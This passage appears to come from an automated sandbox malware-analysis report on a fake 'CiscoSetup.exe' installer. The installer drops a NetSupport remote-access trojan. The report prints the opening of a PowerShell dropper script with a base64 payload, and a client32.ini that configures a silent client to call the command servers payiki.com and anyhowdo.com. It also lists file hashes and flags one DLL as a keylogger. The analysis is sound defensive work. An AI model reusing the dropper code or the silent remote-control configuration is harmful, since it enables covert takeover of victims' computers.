                                                                                                                                      Preview:@...e...........S....................................@..........P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1icokz10.gxi.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vpt0fty.4e1.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acwlif01.ii5.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpiwu4j3.duv.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\CiscoSetup.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3548672
                                                                                                                                      Entropy (8bit):6.54053651576307
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:6JYVM+LtVt3P/KuG2ONG9iqLRQf333f5vC:LVL/tnHGYiqlz
                                                                                                                                      MD5:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                      SHA1:49C54A003678DC14A19AC5D07C9BF053B8CD0683
                                                                                                                                      SHA-256:2EA785B8A4CF5C5FC457350A4C636DAC40137269A1A93D24C1083F1F77324D5D
                                                                                                                                      SHA-512:3E4E2A32F50C6BB200AF8A37C8653EF55E6D8FF47042266181546FD1CCF125A4FD5D2B7D8801D9179BF5E899C4992092895EE6F0D3F4E11AC8D5A1F40E5F82BF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6144
                                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:ASCII text, with very long lines (65337), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3035662
                                                                                                                                      Entropy (8bit):5.9992843080053095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:Ae6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:f
                                                                                                                                      MD5:2D47F35F6EC3ABDFA6DF92CB13BEF294
                                                                                                                                      SHA1:16E532CAAC6B7176369F5FA29A869FFA0DEF8947
                                                                                                                                      SHA-256:85C3C72A135EE57914D27C563E9AE31F417AF72FA04AB2D3A09F10EB674455CB
                                                                                                                                      SHA-512:E6BE961E4F384749F621E3B14F2B1468F3218480DE3EEAA0C7A6448F70911FC942B30D1C135729EDEA9BD489C8B5F42FD255617A79428568DF2A58F9D6C0E134
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1, Author: Joe Security
                                                                                                                                      Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\Cisco";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFelrJc4

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):93560
                                                                                                                                      Entropy (8bit):6.5461580255883876
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                                      MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                                      SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                                      SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                                      SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328056
                                                                                                                                      Entropy (8bit):6.754723001562745
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\NSM.LIC

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):259
                                                                                                                                      Entropy (8bit):5.103526864179364
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                      MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                                      SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                      SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                      SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18808
                                                                                                                                      Entropy (8bit):6.22028391196942
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3642864
                                                                                                                                      Entropy (8bit):6.5156874906689275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                      MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                      SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                      SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                                      SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):459760
                                                                                                                                      Entropy (8bit):6.678291257338415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                      MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                      SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                      SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                      SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\client32.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):121304
                                                                                                                                      Entropy (8bit):6.150456878585649
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                      MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                      SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                      SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\client32.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):638
                                                                                                                                      Entropy (8bit):5.396410176198281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                      MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                      SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                      SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                      SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\msvcr100.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):773968
                                                                                                                                      Entropy (8bit):6.901559811406837
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\nskbfltr.inf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328
                                                                                                                                      Entropy (8bit):4.93007757242403
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                      C:\Users\user\AppData\Roaming\Cisco\nsm_vpro.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):46
                                                                                                                                      Entropy (8bit):4.532048032699691
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                      MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                      SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
